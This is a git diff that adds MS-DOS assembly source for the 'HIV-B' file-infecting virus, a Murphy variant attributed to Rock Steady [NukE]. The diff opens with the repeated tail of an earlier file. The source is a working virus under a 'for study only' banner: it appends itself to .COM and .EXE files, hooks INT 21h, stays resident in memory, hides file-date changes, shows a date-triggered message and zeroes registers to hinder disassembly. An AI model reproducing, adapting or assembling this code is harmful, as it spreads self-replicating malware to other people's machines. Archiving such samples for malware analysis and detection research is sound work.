+;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* + +SUB_10 PROC NEAR + XOR AX,AX ; If if wants to dissamble + XOR BX,BX ; us give him a HARD time... + XOR CX,CX ; By making all into 0 + XOR DX,DX ; Zero register + XOR SI,SI ; Zero register + XOR DI,DI ; Zero register + XOR BP,BP ; Zero register + RETN +SUB_10 ENDP + +LOC_35: + PUSH DS + CALL SUB_11 + +;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* +;*- SUBROUTINE *- +;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* + +SUB_11 PROC NEAR + MOV AX,4B4DH + INT 21H ; Load and EXEC file... + ; be runned... + NOP + JC LOC_36 ; Jump if carry Set + JMP LOC_46 +LOC_36: + POP SI + PUSH SI + MOV DI,SI + XOR AX,AX ; Zero register + PUSH AX + POP DS + LES AX,DWORD PTR DS:DATA_1E ; Load 32 bit ptr + MOV CS:DATA_49E[SI],AX ; Move lots of data + MOV CS:DATA_50E[SI],ES ; into CS to infect the file + LES BX,DWORD PTR DS:DATA_3E ; if not infected and shit.. + MOV CS:DATA_47E[DI],BX + MOV CS:DATA_48E[DI],ES + MOV AX,DS:DATA_7E + CMP AX,0F000H + JNE LOC_44 ; Jump if not equal + MOV DL,80H + MOV AX,DS:DATA_8E + CMP AX,0F000H + JE LOC_37 ; Jump if equal + CMP AH,0C8H + JB LOC_44 ; Jump if below + CMP AH,0F4H + JAE LOC_44 ; Jump if above or = + TEST AL,7FH + JNZ LOC_44 ; Jump if not zero + MOV DS,AX + CMP WORD PTR DS:DATA_51E,0AA55H + JNE LOC_44 ; Jump if not equal + MOV DL,DS:DATA_52E +LOC_37: + MOV DS,AX + XOR DH,DH ; Zero register + MOV CL,9 + SHL DX,CL ; Shift w/zeros fill + MOV CX,DX + XOR SI,SI ; Zero register + +LOCLOOP_38: + LODSW ; String [si] to ax + CMP AX,0FA80H + JNE LOC_39 ; Jump if not equal + LODSW ; String [si] to ax + CMP AX,7380H + JE LOC_40 ; Jump if equal + JNZ LOC_41 ; Jump if not zero +LOC_39: + CMP AX,0C2F6H + JNE LOC_42 ; Jump if not equal + LODSW ; String [si] to ax + CMP AX,7580H + JNE LOC_41 ; Jump if not equal +LOC_40: + INC SI + LODSW ; String [si] to ax + CMP AX,40CDH + JE LOC_43 ; Jump if equal + SUB SI,3 +LOC_41: + DEC SI + DEC SI +LOC_42: + DEC SI + LOOP LOCLOOP_38 ; Loop if cx > 0 + + JMP SHORT LOC_44 +LOC_43: + SUB SI,7 + MOV CS:DATA_49E[DI],SI + MOV CS:DATA_50E[DI],DS +LOC_44: + MOV AH,62H + INT 21H ; Simple...Get the PSP + ; Address (Program segment + MOV ES,BX ; address and but in BX) + MOV AH,49H + INT 21H ; Get the Free memory from + ; the system + MOV BX,0FFFFH ; release extra memory blocks + MOV AH,48H + INT 21H ; Allocate the memory + ; At BX (# bytes) + SUB BX,66H ; it attaches virus right + NOP ; under the 640k + JC LOC_46 + MOV CX,ES ; did it work? If not just + STC ; end the virus... + ADC CX,BX + MOV AH,4AH + INT 21H ; Adjust teh memory block + ; size! BX has the # of bytes + MOV BX,65H + STC ; Set carry flag + SBB ES:DATA_17E,BX ; Where to attach itself! + PUSH ES ; under 640K + MOV ES,CX + MOV AH,4AH + INT 21H ; Just change the memory + ; allocations! (BX=Btyes Size) + MOV AX,ES + DEC AX + MOV DS,AX + MOV WORD PTR DS:DATA_16E,8 ;Same place under 640k + CALL SUB_9 + MOV BX,AX + MOV CX,DX + POP DS + MOV AX,DS + CALL SUB_9 + ADD AX,DS:DATA_18E + ADC DX,0 + SUB AX,BX + SBB DX,CX + JC LOC_45 ; Jump if carry Set + SUB DS:DATA_18E,AX +LOC_45: + MOV SI,DI + XOR DI,DI ; Zero register + PUSH CS + POP DS + SUB SI,4D7H + MOV CX,64EH + INC CX + REP MOVSB ; Rep when cx >0 Mov [si] to + MOV AH,62H ; es:[di] + INT 21H ; Get the Program segment + ; prefix...so we can infect it + DEC BX + MOV DS,BX + MOV BYTE PTR DS:DATA_15E,5AH + MOV DX,1E4H + XOR AX,AX ; Zero register + PUSH AX + POP DS + MOV AX,ES + SUB AX,10H + MOV ES,AX + CLI ; Disable interrupts + MOV DS:DATA_3E,DX ; + MOV WORD PTR DS:DATA_3E+2,ES + STI ; Enable interrupts + DEC BYTE PTR DS:DATA_14E ; +LOC_46: + POP SI + CMP WORD PTR CS:DATA_42E[SI],5A4DH + JNE LOC_47 ; Jump if not equal + POP DS + MOV AX,CS:DATA_46E[SI] + MOV BX,CS:DATA_45E[SI] ; all this shit is to restore + PUSH CS ; the program and continue + POP CX ; running the original + SUB CX,AX ; program... + ADD CX,BX + PUSH CX + PUSH WORD PTR CS:DATA_44E[SI] + PUSH DS + POP ES + CALL SUB_10 + RETF +LOC_47: + POP AX + MOV AX,CS:DATA_42E[SI] + MOV WORD PTR CS:[100H],AX + MOV AX,CS:DATA_43E[SI] + MOV WORD PTR CS:[102H],AX + MOV AX,100H + PUSH AX + PUSH CS + POP DS + PUSH DS + POP ES + CALL SUB_10 + RETN +SUB_11 ENDP + + +SEG_A ENDS + + + + END START diff --git a/MSDOS/Virus.MSDOS.Unknown.hiv.asm b/MSDOS/Virus.MSDOS.Unknown.hiv.asm new file mode 100644 index 00000000..c5d168ad --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.hiv.asm @@ -0,0 +1,843 @@ +;****************************************************************************; +; ; +; -=][][][][][][][][][][][][][][][=- ; +; -=] P E R F E C T C R I M E [=- ; +; -=] +31.(o)79.426o79 [=- ; +; -=] [=- ; +; -=] For All Your H/P/A/V Files [=- ; +; -=] SysOp: Peter Venkman [=- ; +; -=] [=- ; +; -=] +31.(o)79.426o79 [=- ; +; -=] P E R F E C T C R I M E [=- ; +; -=][][][][][][][][][][][][][][][=- ; +; ; +; *** NOT FOR GENERAL DISTRIBUTION *** ; +; ; +; This File is for the Purpose of Virus Study Only! It Should not be Passed ; +; Around Among the General Public. It Will be Very Useful for Learning how ; +; Viruses Work and Propagate. But Anybody With Access to an Assembler can ; +; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ; +; Experience can Turn it Into a far More Malevolent Program Than it Already ; +; Is. Keep This Code in Responsible Hands! ; +; ; +;****************************************************************************; +> HIV Virus Source : + + HIV - VIRUS + Created: March 1991 + Scan ID: [Murphy] + Origin: Italy ,"Italain Virus Laboratory!" + Sources: Produced by Rock Steady [NukE] + + [NukE] Notes: Okay, another VIRUS SOURCE Release from [NukE]! Yup, + ~~~~~~~~~~~~~ Anywayz, this Virus cums from the Murphy Virus! So + if you Scan it with SCAN McAfee & Ass. you will see that it will be + detected as the [Murphy] Virus! I got this Virus from Italy from the + "Italian Virus Laboratory!" Mind you this Virus Source is being + released to the public because it's an OLD Virus and is detectable! + and doesn't do any damage to the system! This virus was edited by + me, I removed some bugs inside and produced this SOURCE CODE ONLY! + [NOTE] Of course, this virus is ONLY for STUDYING, to learn on how + virus are made! After the viruses are old its NICE to release them so + people can study em! + + HOW THE HIV - VIRUS WORKS + + First, I'd like to thanx all those that thanked me for my latest + Virus! (ParaSite Virus)! And I'm glad to say I'll be releasing the + Source Codes to this virus in 6 MONTHS! Hopefully, by that time it + will be Detected by SCAN (McAfee & Ass) and yall will get a chance + to study this Assome Virus made totally from me... + + HIV -: This virus Spreads thru coping itself to .EXE and .COM Files! + ~~~~~~ You will notice the file gets larger by 1614 Bytes! The Virus + Hooks itself to Interrup 21h and totally system memory will be 1632 + Bytes Less. Once the file is resident in Memory it will attach itself + to every file that is runned or opened! The date of the original file + Doesn't not change! All this virus does is Copy itself over and over + again! CleanUp V77+ will get rid of it...or Simple delete all files + Infected with the virus...Anywayz Enjoy... + + NOTE: If you want to compile the source, simply look for it in the .TXT files + contained in DATA.EXE in this newsletter package. + +DATA_1E EQU 4CH ; Just a Few Data Segments that are +DATA_3E EQU 84H ; Needed for the virus to find some +DATA_5E EQU 90H ; hard core info... +DATA_7E EQU 102H +DATA_8E EQU 106H +DATA_9E EQU 122H +DATA_10E EQU 124H +DATA_11E EQU 15AH +DATA_12E EQU 450H +DATA_13E EQU 462H +DATA_14E EQU 47BH +DATA_15E EQU 0 +DATA_16E EQU 1 +DATA_17E EQU 2 +DATA_18E EQU 6 +DATA_42E EQU 0FB2CH +DATA_43E EQU 0FB2EH +DATA_44E EQU 0FB4BH +DATA_45E EQU 0FB4DH +DATA_46E EQU 0FB83H +DATA_47E EQU 0FB8DH +DATA_48E EQU 0FB8FH +DATA_49E EQU 0FB95H +DATA_50E EQU 0FB97H +DATA_51E EQU 0 +DATA_52E EQU 2 + +SEG_A SEGMENT BYTE PUBLIC + ASSUME CS:SEG_A, DS:SEG_A + + + ORG 100h ; Compile this to a .COM file! + ; So the Virus starts at 0100h +HIV PROC FAR + +START: + JMP LOC_35 + DB 0C3H + DB 23 DUP (0C3H) + DB 61H, 6EH, 74H, 69H, 64H, 65H + DB 62H, 0C3H, 0C3H, 0C3H, 0C3H + DB 'HIV-B Virus - Release 1.1 [NukE]' + DB ' ' +copyright DB '(C) Edited by Rock Steady [NukE]' + DB 0, 0 +DATA_24 DW 0 +DATA_25 DW 0 +DATA_26 DW 0 +DATA_27 DW 706AH +DATA_28 DD 00000H +DATA_29 DW 0 +DATA_30 DW 706AH +DATA_31 DD 00000H +DATA_32 DW 0 +DATA_33 DW 706AH +DATA_34 DB 'HIV-B VIRUS - Release 1.1 [NukE]', 0AH, 0DH + DB 'Edited by Rock Steady [NukE]', 0AH, 0DH + DB '(C) 1991 Italian Virus Laboratory', 0AH, 0DH + DB '$' + DB 0E8H, 83H, 3, 3DH, 4DH, 4BH + DB 75H, 9, 55H, 8BH, 0ECH, 83H + DB 66H, 6, 0FEH, 5DH, 0CFH, 80H + DB 0FCH, 4BH, 74H, 12H, 3DH, 0 + DB 3DH, 74H, 0DH, 3DH, 0, 6CH + DB 75H, 5, 80H, 0FBH, 0, 74H + DB 3 +LOC_1: + JMP LOC_13 +LOC_2: + PUSH ES ; Save All Regesters so that when + PUSH DS ; we restore the program it will + PUSH DI ; RUN correctly and hide the fact + PUSH SI ; that any Virii is tampering with + PUSH BP ; the System.... + PUSH DX + PUSH CX + PUSH BX + PUSH AX + CALL SUB_6 + CALL SUB_7 + CMP AX,6C00H + JNE LOC_3 ; Jump if not equal + MOV DX,SI +LOC_3: + MOV CX,80H + MOV SI,DX + +LOCLOOP_4: + INC SI ; Slowly down the System a + MOV AL,[SI] ; little. + OR AL,AL ; Zero ? + LOOPNZ LOCLOOP_4 ; Loop if zf=0, cx>0 + + SUB SI,2 + CMP WORD PTR [SI],4D4FH + JE LOC_7 ; Jump if equal + CMP WORD PTR [SI],4558H + JE LOC_6 ; Jump if equal +LOC_5: + JMP SHORT LOC_12 ; + DB 90H +LOC_6: + CMP WORD PTR [SI-2],452EH + JE LOC_8 ; Jump if equal + JMP SHORT LOC_5 ; +LOC_7: + NOP + CMP WORD PTR [SI-2],432EH + JNE LOC_5 ; Jump if not equal +LOC_8: + MOV AX,3D02H + CALL SUB_5 + JC LOC_12 ; Jump if carry Set + MOV BX,AX + MOV AX,5700H + CALL SUB_5 ; Initsilize the virus... + MOV CS:DATA_24,CX ; A Basic Start up to check + MOV CS:DATA_25,DX ; The Interrup 21h + MOV AX,4200H + XOR CX,CX + XOR DX,DX + CALL SUB_5 + PUSH CS + POP DS + MOV DX,103H + MOV SI,DX + MOV CX,18H + MOV AH,3FH + CALL SUB_5 + JC LOC_10 ; Jump if carry Set + CMP WORD PTR [SI],5A4DH + JNE LOC_9 ; Jump if not equal + CALL SUB_1 + JMP SHORT LOC_10 +LOC_9: + CALL SUB_4 +LOC_10: + JC LOC_11 ; Jump if carry Set + MOV AX,5701H + MOV CX,CS:DATA_24 + MOV DX,CS:DATA_25 + CALL SUB_5 +LOC_11: + MOV AH,3EH ; '>' + CALL SUB_5 +LOC_12: + CALL SUB_7 + POP AX ; A Stealth Procedure to + POP BX ; end the virus and restore + POP CX ; the program! Pup back all + POP DX ; regesters as we found them! + POP BP ; so nothings changed... + POP SI + POP DI + POP DS + POP ES +LOC_13: + JMP CS:DATA_28 + DB 0B4H, 2AH, 0CDH, 21H, 0C3H + +HIV ENDP + +;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* +;*- SUBROUTINE *- +;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* + +SUB_1 PROC NEAR ; Start of the Virus! + MOV AH,2AH ; Get the Date system Date! + INT 21H ; If its Friday Display the + ; message at Data34 and End! + CMP AL,6 + JE LOC_15 ; If Friday display message + JNZ LOC_14 ; If not continue infecting +LOC_14: ; and screwing the system! + MOV CX,[SI+16H] + ADD CX,[SI+8] + MOV AX,10H + MUL CX ; dx:ax = reg * ax + ADD AX,[SI+14H] + ADC DX,0 + PUSH DX + PUSH AX + MOV AX,4202H + XOR CX,CX ; Zero register + XOR DX,DX ; Zero register + CALL SUB_5 + CMP DX,0 + JNE LOC_16 ; Jump if not equal + CMP AX,64EH + JAE LOC_16 ; Jump if above or = + POP AX + POP DX + STC ; Set carry flag + RETN +LOC_15: + MOV DX,OFFSET DATA_34+18H ; Display Message at Data34! + MOV AH,9 ; With New Offset Address in + INT 21H ; memory! + ; + POP AX ; Restore all Regesters as if + POP BX ; nothing was changed and exit + POP CX ; virus and run File... + POP DX + POP SI + POP DI + POP BP + POP DS + POP ES + MOV AH,0 ; Exit Virus if your in a .EXE + INT 21H ; File!!! + ; Exit virus if your in a .COM + INT 20H ; File!!! +LOC_16: + MOV DI,AX + MOV BP,DX + POP CX + SUB AX,CX + POP CX + SBB DX,CX + CMP WORD PTR [SI+0CH],0 + JE LOC_RET_19 ; Jump if equal + CMP DX,0 + JNE LOC_17 ; Jump if not equal + CMP AX,64EH + JNE LOC_17 ; Jump if not equal + STC ; Set carry flag + RETN +LOC_17: + MOV DX,BP + MOV AX,DI + PUSH DX + PUSH AX + ADD AX,64EH + ADC DX,0 + MOV CX,200H + DIV CX ; Find out How much System + LES DI,DWORD PTR [SI+2] ; memory is available... + MOV CS:DATA_26,DI ; + MOV CS:DATA_27,ES ; Every so often make the + MOV [SI+2],DX ; system memory small than + CMP DX,0 ; what it already is... + JE LOC_18 ; Screws up the users hehe + INC AX +LOC_18: + MOV [SI+4],AX + POP AX + POP DX + CALL SUB_2 + SUB AX,[SI+8] + LES DI,DWORD PTR [SI+14H] + MOV DS:DATA_9E,DI + MOV DS:DATA_10E,ES + MOV [SI+14H],DX ; Tie up some memory! + MOV [SI+16H],AX ; release it on next execution + MOV DS:DATA_11E,AX ; Jump to su routine to do + MOV AX,4202H ; this and disable interrups + XOR CX,CX + XOR DX,DX + CALL SUB_5 + CALL SUB_3 + JC LOC_RET_19 + MOV AX,4200H + XOR CX,CX ; Zero register + XOR DX,DX ; Zero register + CALL SUB_5 + MOV AH,40H + MOV DX,SI + MOV CX,18H + CALL SUB_5 +LOC_RET_19: + RETN +SUB_1 ENDP + + +;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* +;*- SUBROUTINE *- +;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* + +SUB_2 PROC NEAR + MOV CX,4 + MOV DI,AX + AND DI,0FH + +LOCLOOP_20: + SHR DX,1 ; Shift w/zeros fill + RCR AX,1 ; Rotate thru carry + LOOP LOCLOOP_20 ; Loop if cx > 0 + + MOV DX,DI + RETN +SUB_2 ENDP + + +;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* +;*- SUBROUTINE *- +;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* + +SUB_3 PROC NEAR + MOV AH,40H + MOV CX,64EH + MOV DX,100H + CALL SUB_6 + JMP SHORT LOC_24 + DB 90H + +;*-*- External Entry into Subroutine -*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* + +SUB_4: + MOV AX,4202H + XOR CX,CX ; Zero register + XOR DX,DX ; Zero register + CALL SUB_5 + CMP AX,64EH + JB LOC_RET_23 ; Jump if below + CMP AX,0FA00H + JAE LOC_RET_23 ; Jump if above or = + PUSH AX + CMP BYTE PTR [SI],0E9H + JNE LOC_21 ; Jump if not equal + SUB AX,651H + CMP AX,[SI+1] + JNE LOC_21 ; Jump if not equal + POP AX + STC ; Set carry flag + RETN +LOC_21: + CALL SUB_3 + JNC LOC_22 ; Jump if carry=0 + POP AX + RETN +LOC_22: + MOV AX,4200H + XOR CX,CX ; Zero register + XOR DX,DX ; Zero register + CALL SUB_5 + POP AX + SUB AX,3 + MOV DX,122H + MOV SI,DX + MOV BYTE PTR CS:[SI],0E9H + MOV CS:[SI+1],AX + MOV AH,40H + MOV CX,3 + CALL SUB_5 + +LOC_RET_23: + RETN +SUB_3 ENDP + + +;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* +;*- SUBROUTINE *- +;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* + +SUB_5 PROC NEAR +LOC_24: + PUSHF ; Push flags + CALL CS:DATA_28 + RETN +SUB_5 ENDP + + +;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* +;*- SUBROUTINE *- +;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* + +SUB_6 PROC NEAR + PUSH AX + PUSH DS + PUSH ES + XOR AX,AX ; Zero register + PUSH AX + POP DS + CLI ; Disable the interrupts + LES AX,DWORD PTR DS:DATA_5E ; This Copies the Virus + MOV CS:DATA_29,AX ; to the COM File... + MOV CS:DATA_30,ES + MOV AX,46AH + MOV DS:DATA_5E,AX + MOV WORD PTR DS:DATA_5E+2,CS + LES AX,DWORD PTR DS:DATA_1E ; Loads 32Bit word.. + MOV CS:DATA_32,AX ; get your info needed on + MOV CS:DATA_33,ES ; System... + LES AX,CS:DATA_31 + MOV DS:DATA_1E,AX + MOV WORD PTR DS:DATA_1E+2,ES + STI ; Enable the interrupts + POP ES ; and restore regesters! + POP DS ; go back to the file + POP AX ; being executed... + RETN +SUB_6 ENDP + + +;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* +;*- SUBROUTINE *- +;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* + +SUB_7 PROC NEAR + PUSH AX + PUSH DS + PUSH ES + XOR AX,AX ; Zero register + PUSH AX + POP DS + CLI ; Disable interrupts + LES AX,DWORD PTR CS:DATA_29 ; same as Sub_6 just copy + MOV DS:DATA_5E,AX ; yourself to the EXE + MOV WORD PTR DS:DATA_5E+2,ES + LES AX,DWORD PTR CS:DATA_32 + MOV DS:DATA_1E,AX + MOV WORD PTR DS:DATA_1E+2,ES + STI ; Enable interrupts + POP ES + POP DS + POP AX + RETN +SUB_7 ENDP + + DB 0B0H, 3, 0CFH, 50H, 53H, 51H + DB 52H, 56H, 57H, 55H, 1EH, 6 + DB 33H, 0C0H, 50H, 1FH, 8AH, 3EH + DB 62H, 4, 0A1H, 50H, 4, 2EH + DB 0A3H, 0CEH, 4, 2EH, 0A1H, 0C7H + DB 4, 0A3H, 50H, 4, 2EH, 0A1H + DB 0C5H, 4, 8AH, 0DCH, 0B4H, 9 + DB 0B9H, 1, 0, 0CDH, 10H, 0E8H + DB 34H, 0, 0E8H, 0B7H, 0, 2EH + DB 0A1H, 0C7H, 4, 0A3H, 50H, 4 + DB 0B3H, 2, 0B8H, 2, 9, 0B9H + DB 1, 0, 0CDH, 10H, 2EH, 0A1H + DB 0CEH, 4, 0A3H, 50H, 4, 7 + DB 1FH + DB ']_^ZY[X.' + DB 0FFH, 2EH, 0CAH, 4 +DATA_36 DW 0 +DATA_37 DW 1010H +DATA_39 DB 0 +DATA_40 DD 706A0000H + DB 0, 0, 2EH, 0A1H, 0C7H, 4 + DB 8BH, 1EH, 4AH, 4, 4BH, 2EH + DB 0F6H, 6, 0C9H, 4, 1, 74H + DB 0CH, 3AH, 0C3H, 72H, 12H, 2EH + DB 80H, 36H, 0C9H, 4, 1, 0EBH + DB 0AH +LOC_25: + CMP AL,0 + JG LOC_26 ; Jump if > + XOR CS:DATA_39,1 +LOC_26: + TEST CS:DATA_39,2 + JZ LOC_27 ; Jump if zero + CMP AH,18H + JB LOC_28 ; Jump if below + XOR CS:DATA_39,2 + JMP SHORT LOC_28 +LOC_27: + CMP AH,0 + JG LOC_28 ; Jump if > + XOR CS:DATA_39,2 +LOC_28: + CMP BYTE PTR CS:DATA_36,20H + JE LOC_29 ; Jump if equal + CMP BYTE PTR CS:DATA_37+1,0 + JE LOC_29 ; Jump if equal + XOR CS:DATA_39,2 +LOC_29: + TEST CS:DATA_39,1 + JZ LOC_30 ; Jump if zero + INC BYTE PTR CS:DATA_37 + JMP SHORT LOC_31 +LOC_30: + DEC BYTE PTR CS:DATA_37 ; (706A:04C7=10H) +LOC_31: + TEST CS:DATA_39,2 ; (706A:04C9=0) + JZ LOC_32 ; Jump if zero + INC BYTE PTR CS:DATA_37+1 ; (706A:04C8=10H) + JMP SHORT LOC_RET_33 ; (0555) +LOC_32: + DEC BYTE PTR CS:DATA_37+1 ; (706A:04C8=10H) + +LOC_RET_33: + RETN + +;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* +;*- SUBROUTINE *- +;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* + +SUB_8 PROC NEAR + MOV AX,CS:DATA_37 + MOV DS:DATA_12E,AX ; Get info on type of Video + MOV BH,DS:DATA_13E ; Display the system has... + MOV AH,8 + INT 10H ; with ah=functn 08h + ; basically fuck the cursur.. + MOV CS:DATA_36,AX + RETN +SUB_8 ENDP + + DB 50H, 53H, 51H, 52H, 56H, 57H + DB 55H, 1EH, 6, 33H, 0C0H, 50H + DB 1FH, 81H, 3EH, 70H, 0, 6DH + DB 4, 74H, 35H, 0A1H, 6CH, 4 + DB 8BH, 16H, 6EH, 4, 0B9H, 0FFH + DB 0FFH, 0F7H, 0F1H, 3DH, 10H, 0 + DB 75H, 24H, 0FAH, 8BH, 2EH, 50H + DB 4, 0E8H, 0BEH, 0FFH, 89H, 2EH + DB 50H, 4, 0C4H, 6, 70H, 0 + DB 2EH, 0A3H, 0CAH, 4, 2EH, 8CH + DB 6, 0CCH, 4, 0C7H, 6, 70H + DB 0, 6DH, 4, 8CH, 0EH, 72H + DB 0, 0FBH +LOC_34: + POP ES + POP DS ; Restore and get lost... + POP BP + POP DI + POP SI + POP DX + POP CX + POP BX + POP AX + RETN + +;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* +;*- SUBROUTINE *- +;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* +SUB_9 PROC NEAR + MOV DX,10H + MUL DX ; dx:ax = reg * ax + RETN +SUB_9 ENDP + + +;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* +;*- SUBROUTINE *- +;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* + +SUB_10 PROC NEAR + XOR AX,AX ; If if wants to dissamble + XOR BX,BX ; us give him a HARD time... + XOR CX,CX ; By making all into 0 + XOR DX,DX ; Zero register + XOR SI,SI ; Zero register + XOR DI,DI ; Zero register + XOR BP,BP ; Zero register + RETN +SUB_10 ENDP + +LOC_35: + PUSH DS + CALL SUB_11 + +;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* +;*- SUBROUTINE *- +;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* + +SUB_11 PROC NEAR + MOV AX,4B4DH + INT 21H ; Load and EXEC file... + ; be runned... + NOP + JC LOC_36 ; Jump if carry Set + JMP LOC_46 +LOC_36: + POP SI + PUSH SI + MOV DI,SI + XOR AX,AX ; Zero register + PUSH AX + POP DS + LES AX,DWORD PTR DS:DATA_1E ; Load 32 bit ptr + MOV CS:DATA_49E[SI],AX ; Move lots of data + MOV CS:DATA_50E[SI],ES ; into CS to infect the file + LES BX,DWORD PTR DS:DATA_3E ; if not infected and shit.. + MOV CS:DATA_47E[DI],BX + MOV CS:DATA_48E[DI],ES + MOV AX,DS:DATA_7E + CMP AX,0F000H + JNE LOC_44 ; Jump if not equal + MOV DL,80H + MOV AX,DS:DATA_8E + CMP AX,0F000H + JE LOC_37 ; Jump if equal + CMP AH,0C8H + JB LOC_44 ; Jump if below + CMP AH,0F4H + JAE LOC_44 ; Jump if above or = + TEST AL,7FH + JNZ LOC_44 ; Jump if not zero + MOV DS,AX + CMP WORD PTR DS:DATA_51E,0AA55H + JNE LOC_44 ; Jump if not equal + MOV DL,DS:DATA_52E +LOC_37: + MOV DS,AX + XOR DH,DH ; Zero register + MOV CL,9 + SHL DX,CL ; Shift w/zeros fill + MOV CX,DX + XOR SI,SI ; Zero register + +LOCLOOP_38: + LODSW ; String [si] to ax + CMP AX,0FA80H + JNE LOC_39 ; Jump if not equal + LODSW ; String [si] to ax + CMP AX,7380H + JE LOC_40 ; Jump if equal + JNZ LOC_41 ; Jump if not zero +LOC_39: + CMP AX,0C2F6H + JNE LOC_42 ; Jump if not equal + LODSW ; String [si] to ax + CMP AX,7580H + JNE LOC_41 ; Jump if not equal +LOC_40: + INC SI + LODSW ; String [si] to ax + CMP AX,40CDH + JE LOC_43 ; Jump if equal + SUB SI,3 +LOC_41: + DEC SI + DEC SI +LOC_42: + DEC SI + LOOP LOCLOOP_38 ; Loop if cx > 0 + + JMP SHORT LOC_44 +LOC_43: + SUB SI,7 + MOV CS:DATA_49E[DI],SI + MOV CS:DATA_50E[DI],DS +LOC_44: + MOV AH,62H + INT 21H ; Simple...Get the PSP + ; Address (Program segment + MOV ES,BX ; address and but in BX) + MOV AH,49H + INT 21H ; Get the Free memory from + ; the system + MOV BX,0FFFFH ; release extra memory blocks + MOV AH,48H + INT 21H ; Allocate the memory + ; At BX (# bytes) + SUB BX,66H ; it attaches virus right + NOP ; under the 640k + JC LOC_46 + MOV CX,ES ; did it work? If not just + STC ; end the virus... + ADC CX,BX + MOV AH,4AH + INT 21H ; Adjust teh memory block + ; size! BX has the # of bytes + MOV BX,65H + STC ; Set carry flag + SBB ES:DATA_17E,BX ; Where to attach itself! + PUSH ES ; under 640K + MOV ES,CX + MOV AH,4AH + INT 21H ; Just change the memory + ; allocations! (BX=Btyes Size) + MOV AX,ES + DEC AX + MOV DS,AX + MOV WORD PTR DS:DATA_16E,8 ;Same place under 640k + CALL SUB_9 + MOV BX,AX + MOV CX,DX + POP DS + MOV AX,DS + CALL SUB_9 + ADD AX,DS:DATA_18E + ADC DX,0 + SUB AX,BX + SBB DX,CX + JC LOC_45 ; Jump if carry Set + SUB DS:DATA_18E,AX +LOC_45: + MOV SI,DI + XOR DI,DI ; Zero register + PUSH CS + POP DS + SUB SI,4D7H + MOV CX,64EH + INC CX + REP MOVSB ; Rep when cx >0 Mov [si] to + MOV AH,62H ; es:[di] + INT 21H ; Get the Program segment + ; prefix...so we can infect it + DEC BX + MOV DS,BX + MOV BYTE PTR DS:DATA_15E,5AH + MOV DX,1E4H + XOR AX,AX ; Zero register + PUSH AX + POP DS + MOV AX,ES + SUB AX,10H + MOV ES,AX + CLI ; Disable interrupts + MOV DS:DATA_3E,DX ; + MOV WORD PTR DS:DATA_3E+2,ES + STI ; Enable interrupts + DEC BYTE PTR DS:DATA_14E ; +LOC_46: + POP SI + CMP WORD PTR CS:DATA_42E[SI],5A4DH + JNE LOC_47 ; Jump if not equal + POP DS + MOV AX,CS:DATA_46E[SI] + MOV BX,CS:DATA_45E[SI] ; all this shit is to restore + PUSH CS ; the program and continue + POP CX ; running the original + SUB CX,AX ; program... + ADD CX,BX + PUSH CX + PUSH WORD PTR CS:DATA_44E[SI] + PUSH DS + POP ES + CALL SUB_10 + RETF +LOC_47: + POP AX + MOV AX,CS:DATA_42E[SI] + MOV WORD PTR CS:[100H],AX + MOV AX,CS:DATA_43E[SI] + MOV WORD PTR CS:[102H],AX + MOV AX,100H + PUSH AX + PUSH CS + POP 